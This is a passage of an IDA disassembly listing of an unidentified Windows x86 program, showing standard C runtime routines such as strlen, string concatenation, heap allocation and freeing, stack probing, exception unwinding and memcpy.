test dl, dl
jz short loc_415B08
test dh, dh
jz short loc_415AFF
test edx, 0FF0000h
jz short loc_415AF2
test edx, 0FF000000h
jz short loc_415AEA
jmp short loc_415AB1
; ---------------------------------------------------------------------------
loc_415AEA: ; CODE XREF: sub_415A30+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_415AF2: ; CODE XREF: sub_415A30+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_415AFF: ; CODE XREF: sub_415A30+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_415B08: ; CODE XREF: sub_415A30+72�j
; sub_415A30+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_415A30 endp
; =============== S U B R O U T I N E =======================================
sub_415B10 proc near ; CODE XREF: sub_4021FB+19C�p
; sub_4021FB+1F0�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_415B30
loc_415B1C: ; CODE XREF: sub_415B10+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_415B63
test ecx, 3
jnz short loc_415B1C
add eax, 0
loc_415B30: ; CODE XREF: sub_415B10+A�j
; sub_415B10+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_415B30
mov eax, [ecx-4]
test al, al
jz short loc_415B81
test ah, ah
jz short loc_415B77
test eax, 0FF0000h
jz short loc_415B6D
test eax, 0FF000000h
jz short loc_415B63
jmp short loc_415B30
; ---------------------------------------------------------------------------
loc_415B63: ; CODE XREF: sub_415B10+11�j
; sub_415B10+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_415B6D: ; CODE XREF: sub_415B10+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_415B77: ; CODE XREF: sub_415B10+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_415B81: ; CODE XREF: sub_415B10+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_415B10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415B90 proc near ; CODE XREF: sub_4024D0+8�p
; sub_40297A+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_415BB0
loc_415B9C: ; CODE XREF: sub_415B90+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_415B9C
loc_415BB0: ; CODE XREF: sub_415B90+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_415B90 endp
; =============== S U B R O U T I N E =======================================
sub_415BBF proc near ; CODE XREF: sub_402FCD+7A�p
; sub_402FCD+8A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, eax
cmp word ptr [eax], 0
jz short loc_415BD3
loc_415BCB: ; CODE XREF: sub_415BBF+12�j
inc ecx
inc ecx
cmp word ptr [ecx], 0
jnz short loc_415BCB
loc_415BD3: ; CODE XREF: sub_415BBF+A�j
mov edx, [esp+arg_4]
push esi
loc_415BD8: ; CODE XREF: sub_415BBF+26�j
mov si, [edx]
mov [ecx], si
inc ecx
inc ecx
inc edx
inc edx
test si, si
jnz short loc_415BD8
pop esi
retn
sub_415BBF endp
; =============== S U B R O U T I N E =======================================
sub_415BE9 proc near ; CODE XREF: sub_403166+21D�p
; sub_4033B6+BE�p ...
arg_0 = dword ptr 4
push dword_46BB64
push [esp+4+arg_0]
call sub_415BFB
pop ecx
pop ecx
retn
sub_415BE9 endp
; =============== S U B R O U T I N E =======================================
sub_415BFB proc near ; CODE XREF: sub_415BE9+A�p
; sub_416655+6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0FFFFFFE0h
ja short loc_415C24
loc_415C02: ; CODE XREF: sub_415BFB+27�j
push [esp+arg_0]
call sub_415C27
test eax, eax
pop ecx
jnz short locret_415C26
cmp [esp+arg_4], eax
jz short locret_415C26
push [esp+arg_0]
call sub_418A88
test eax, eax
pop ecx
jnz short loc_415C02
loc_415C24: ; CODE XREF: sub_415BFB+5�j
xor eax, eax
locret_415C26: ; CODE XREF: sub_415BFB+13�j
; sub_415BFB+19�j
retn
sub_415BFB endp
; =============== S U B R O U T I N E =======================================
sub_415C27 proc near ; CODE XREF: sub_415BFB+B�p
arg_0 = dword ptr 4
mov eax, dword_46D168
push esi
mov esi, [esp+4+arg_0]
cmp eax, 3
jnz short loc_415C4B
cmp esi, dword_46D160
ja short loc_415C7D
push esi
call sub_419011
test eax, eax
pop ecx
jz short loc_415C7D
pop esi
retn
; ---------------------------------------------------------------------------
loc_415C4B: ; CODE XREF: sub_415C27+D�j
cmp eax, 2
jnz short loc_415C7D
mov eax, [esp+4+arg_0]
test eax, eax
jz short loc_415C60
lea esi, [eax+0Fh]
and esi, 0FFFFFFF0h
jmp short loc_415C63
; ---------------------------------------------------------------------------
loc_415C60: ; CODE XREF: sub_415C27+2F�j
push 10h
pop esi
loc_415C63: ; CODE XREF: sub_415C27+37�j
cmp esi, dword_43A634
ja short loc_415C8A
mov eax, esi
shr eax, 4
push eax
call sub_419AB4
test eax, eax
pop ecx
jnz short loc_415C99
jmp short loc_415C8A
; ---------------------------------------------------------------------------
loc_415C7D: ; CODE XREF: sub_415C27+15�j
; sub_415C27+20�j ...
test esi, esi
jnz short loc_415C84
push 1
pop esi
loc_415C84: ; CODE XREF: sub_415C27+58�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_415C8A: ; CODE XREF: sub_415C27+42�j
; sub_415C27+54�j
push esi
push 0
push dword_46D164
call dword_42114C ; RtlAllocateHeap
loc_415C99: ; CODE XREF: sub_415C27+52�j
pop esi
retn
sub_415C27 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415C9B proc near ; CODE XREF: sub_4033B6+10B�p
; sub_4033B6+113�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_415D01
mov eax, dword_46D168
cmp eax, 3
jnz short loc_415CC7
push esi
call sub_418CBD
pop ecx
test eax, eax
push esi
jz short loc_415CF3
push eax
call sub_418CE8
pop ecx
pop ecx
jmp short loc_415D01
; ---------------------------------------------------------------------------
loc_415CC7: ; CODE XREF: sub_415C9B+14�j
cmp eax, 2
jnz short loc_415CF2
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_4]
push eax
push esi
call sub_419A18
add esp, 0Ch
test eax, eax
jz short loc_415CF2
push eax
push [ebp+arg_0]
push [ebp+var_4]
call sub_419A6F
add esp, 0Ch
jmp short loc_415D01
; ---------------------------------------------------------------------------
loc_415CF2: ; CODE XREF: sub_415C9B+2F�j
; sub_415C9B+44�j
push esi
loc_415CF3: ; CODE XREF: sub_415C9B+20�j
push 0
push dword_46D164
call dword_421150 ; RtlFreeHeap
loc_415D01: ; CODE XREF: sub_415C9B+A�j
; sub_415C9B+2A�j ...
pop esi
leave
retn
sub_415C9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_415D04(double)
sub_415D04 proc near ; CODE XREF: sub_404630+38�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_4383B0
call sub_41A6B1
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_415D8A
call sub_41A579
pop ecx
test eax, eax
pop ecx
jle short loc_415D6D
cmp eax, 2
jle short loc_415D5F
cmp eax, 3
jnz short loc_415D6D
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Bh ; double
call sub_419E89
add esp, 10h
jmp short loc_415DCF
; ---------------------------------------------------------------------------
loc_415D5F: ; CODE XREF: sub_415D04+3F�j
push esi
push ebx
call sub_41A6B1
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_415DCF
; ---------------------------------------------------------------------------
loc_415D6D: ; CODE XREF: sub_415D04+3A�j
; sub_415D04+44�j
fld [ebp+arg_0]
fadd dbl_421670
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Bh
push 8
jmp short loc_415DC7
; ---------------------------------------------------------------------------
loc_415D8A: ; CODE XREF: sub_415D04+2F�j
call sub_41A53E
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_415DAD
loc_415D9F: ; CODE XREF: sub_415D04+AC�j
push esi
push ebx
call sub_41A6B1
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_415DCF
; ---------------------------------------------------------------------------
loc_415DAD: ; CODE XREF: sub_415D04+99�j
test bl, 20h
jnz short loc_415D9F
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Bh ; int
push 10h ; int
loc_415DC7: ; CODE XREF: sub_415D04+84�j
call sub_419EDC
add esp, 1Ch
loc_415DCF: ; CODE XREF: sub_415D04+59�j
; sub_415D04+67�j ...
pop esi
pop ebx
leave
retn
sub_415D04 endp
; =============== S U B R O U T I N E =======================================
sub_415DD3 proc near ; CODE XREF: sub_41781A+9�p
; sub_41A77A+21�p
; DATA XREF: ...
call sub_415DEB
call sub_41A77A
mov dword_46BAE0, eax
call sub_41A72A
fnclex
retn
sub_415DD3 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_415DEB proc near ; CODE XREF: sub_415DD3�p
mov eax, offset sub_41AB68
mov off_43A754, offset sub_41A7FD
mov off_43A750, eax
mov off_43A758, offset sub_41A863
mov off_43A75C, offset sub_41A7A3
mov off_43A760, offset sub_41A84B
mov off_43A764, eax
retn
sub_415DEB endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415E24 proc near ; CODE XREF: sub_404630+1B�p
; sub_404630+44�p ...
var_C = qword ptr -0Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
fstcw [ebp+var_2]
wait
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [ebp+var_C]
fldcw [ebp+var_2]
mov eax, dword ptr [ebp+var_C]
mov edx, dword ptr [ebp+var_C+4]
leave
retn
sub_415E24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_415E4B(double)
sub_415E4B proc near ; CODE XREF: sub_40467C+83�p
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_4383C8
call sub_41A6B1
fld [ebp+arg_0]
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
pop ecx
push ecx
and ax, 7FF0h
push ecx
cmp ax, 7FF0h
fstp [esp+18h+var_18]
jnz short loc_415ED1
call sub_41A579
pop ecx
test eax, eax
pop ecx
jle short loc_415EB4
cmp eax, 2
jle short loc_415EA6
cmp eax, 3
jnz short loc_415EB4
fld [ebp+arg_0]
push ebx
push ecx ; int
push ecx
fstp qword ptr [esp]
push 0Ch ; double
call sub_419E89
add esp, 10h
jmp short loc_415F16
; ---------------------------------------------------------------------------
loc_415EA6: ; CODE XREF: sub_415E4B+3F�j
push esi
push ebx
call sub_41A6B1
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_415F16
; ---------------------------------------------------------------------------
loc_415EB4: ; CODE XREF: sub_415E4B+3A�j
; sub_415E4B+44�j
fld [ebp+arg_0]
fadd dbl_421670
push ebx
push ecx ; double
push ecx
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_415F0E
; ---------------------------------------------------------------------------
loc_415ED1: ; CODE XREF: sub_415E4B+2F�j
call sub_41A53E
fstp [ebp+var_8]
fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_415EF4
loc_415EE6: ; CODE XREF: sub_415E4B+AC�j
push esi
push ebx
call sub_41A6B1
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_415F16
; ---------------------------------------------------------------------------
loc_415EF4: ; CODE XREF: sub_415E4B+99�j
test bl, 20h
jnz short loc_415EE6
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_415F0E: ; CODE XREF: sub_415E4B+84�j
call sub_419EDC
add esp, 1Ch
loc_415F16: ; CODE XREF: sub_415E4B+59�j
; sub_415E4B+67�j ...
pop esi
pop ebx
leave
retn
sub_415E4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F1A proc near ; CODE XREF: sub_41AFD9+71�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_415F1A endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_415F4E proc near ; CODE XREF: sub_41B18A+199�p
; sub_41B34E+3E�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_415F4E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_415F55 proc near ; CODE XREF: sub_41B18A+17F�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_415F55 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F5C proc near ; CODE XREF: sub_41610E+5C�p
; sub_41AFD9:loc_41B00A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov eax, large fs:0
mov [ebp+var_8], eax
mov [ebp+var_4], offset loc_415F84
push 0
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+arg_0]
call sub_420A0C ; RtlUnwind
loc_415F84: ; DATA XREF: sub_415F5C+11�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and al, 0FDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, large fs:0
mov ebx, [ebp+var_8]
mov [ebx], eax
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_415F5C endp
; ---------------------------------------------------------------------------
loc_415FAB: ; CODE XREF: .text:00420B68�j
; .text:00420B85�j ...
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41ABDE
add esp, 20h
mov [ebp+14h], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+14h]
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415FE1 proc near ; CODE XREF: sub_41B054+73�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
mov [ebp+var_10], offset sub_416035
inc eax
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_41B3E0
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_415FE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416035 proc near ; DATA XREF: sub_415FE1+16�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cld
mov eax, [ebp+arg_4]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41ABDE
add esp, 20h
pop ebp
retn
sub_416035 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41605A proc near ; CODE XREF: sub_41AE20+25�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_41610E
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_4160E0
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call dword_46BB88
pop ecx
pop ecx
and [ebp+var_34], 0
loc_4160E0: ; DATA XREF: sub_41605A+3C�o
cmp [ebp+var_4], 0
jz short loc_4160FD
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_416106
; ---------------------------------------------------------------------------
loc_4160FD: ; CODE XREF: sub_41605A+8A�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_416106: ; CODE XREF: sub_41605A+A1�j
mov eax, [ebp+var_34]
pop edi
pop esi
pop ebx
leave
retn
sub_41605A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41610E proc near ; DATA XREF: sub_41605A+D�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_416131
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
push 1
pop eax
jmp short loc_41617E
; ---------------------------------------------------------------------------
loc_416131: ; CODE XREF: sub_41610E+12�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41ABDE
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_41616F
push [ebp+arg_0]
push [ebp+arg_4]
call sub_415F5C
loc_41616F: ; CODE XREF: sub_41610E+54�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
push 1
pop eax
loc_41617E: ; CODE XREF: sub_41610E+21�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41610E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416183 proc near ; CODE XREF: sub_41AC79+C6�p
; sub_41AE20+43�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
cmp [ebp+arg_4], 0
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+arg_0], esi
mov [ebp+var_4], eax
jl short loc_4161DA
loc_4161A1: ; CODE XREF: sub_416183+52�j
cmp esi, 0FFFFFFFFh
jnz short loc_4161AB
call sub_41B482
loc_4161AB: ; CODE XREF: sub_416183+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
cmp [ebx+eax*4+4], ecx
lea eax, [ebx+eax*4]
jge short loc_4161C0
cmp ecx, [eax+8]
jle short loc_4161C5
loc_4161C0: ; CODE XREF: sub_416183+36�j
cmp esi, 0FFFFFFFFh
jnz short loc_4161D1
loc_4161C5: ; CODE XREF: sub_416183+3B�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_4161D1: ; CODE XREF: sub_416183+40�j
cmp [ebp+arg_4], 0
jge short loc_4161A1
mov eax, [ebp+var_4]
loc_4161DA: ; CODE XREF: sub_416183+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_4161EE
cmp esi, eax
jbe short loc_4161F3
loc_4161EE: ; CODE XREF: sub_416183+65�j
call sub_41B482
loc_4161F3: ; CODE XREF: sub_416183+69�j
lea eax, [esi+esi*4]
pop edi
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_416183 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416200 proc near ; CODE XREF: sub_41D6A4+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_416218
push [ebp+arg_0]
call sub_420A0C ; RtlUnwind
loc_416218: ; DATA XREF: sub_416200+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_416200 endp
; =============== S U B R O U T I N E =======================================
sub_416220 proc near ; DATA XREF: sub_416242+A�o
; sub_4162AA+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_416241
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_416241: ; CODE XREF: sub_416220+10�j
retn
sub_416220 endp
; =============== S U B R O U T I N E =======================================
sub_416242 proc near ; CODE XREF: sub_41B0FA+D�p
; sub_41D6A4+67�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_416220
push large dword ptr fs:0
mov large fs:0, esp
loc_41625F: ; CODE XREF: sub_416242:loc_41629A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_41629C
cmp esi, [esp+1Ch+arg_4]
jz short loc_41629C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_41629A
push 101h
mov eax, [ebx+esi*4+8]
call sub_4162D6
call dword ptr [ebx+esi*4+8]
loc_41629A: ; CODE XREF: sub_416242+44�j
jmp short loc_41625F
; ---------------------------------------------------------------------------
loc_41629C: ; CODE XREF: sub_416242+2A�j
; sub_416242+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_416242 endp
; =============== S U B R O U T I N E =======================================
sub_4162AA proc near ; CODE XREF: sub_41B11A+37�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_416220
jnz short locret_4162CC
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_4162CC
mov eax, 1
locret_4162CC: ; CODE XREF: sub_4162AA+10�j
; sub_4162AA+1B�j
retn
sub_4162AA endp
; =============== S U B R O U T I N E =======================================
sub_4162CD proc near ; CODE XREF: sub_41B3E0+1E�p
; sub_41B3E0+40�p
push ebx
push ecx
mov ebx, offset dword_4383CC
jmp short loc_4162E0
sub_4162CD endp
; =============== S U B R O U T I N E =======================================
sub_4162D6 proc near ; CODE XREF: sub_416242+4F�p
; sub_41D6A4+78�p
push ebx
push ecx
mov ebx, offset dword_4383CC
mov ecx, [ebp+8]
loc_4162E0: ; CODE XREF: sub_4162CD+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_4162D6 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4162F0 proc near ; CODE XREF: sub_40467C+5�p
; sub_40481B+5�p ...
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_4162F0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41630F proc near ; CODE XREF: sub_404CE4+22�p
; .text:004207E5�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_415C9B
pop ecx
retn
sub_41630F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416320 proc near ; CODE XREF: sub_404D51+3A�p
; sub_418CE8+2EF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_39 = byte ptr 41h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_416340
cmp edi, eax
jb loc_4164B8
loc_416340: ; CODE XREF: sub_416320+16�j
test edi, 3
jnz short loc_41635C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41637C
rep movsd
jmp off_416468[edx*4]
; ---------------------------------------------------------------------------
loc_41635C: ; CODE XREF: sub_416320+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_416374
and eax, 3
add ecx, eax
jmp dword ptr loc_41637C+4[eax*4]
; ---------------------------------------------------------------------------
loc_416374: ; CODE XREF: sub_416320+46�j
jmp dword ptr loc_416478[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41637C: ; CODE XREF: sub_416320+31�j
; sub_416320+8E�j ...
jmp off_4163FC[ecx*4]
; ---------------------------------------------------------------------------
db 2 dup(90h)
db 63h, 41h, 0
dd offset loc_4163BC
dd offset loc_4163E0
; ---------------------------------------------------------------------------
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41637C
rep movsd
jmp off_416468[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4163BC: ; DATA XREF: sub_416320+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41637C
rep movsd
jmp off_416468[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4163E0: ; DATA XREF: sub_416320+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_41637C
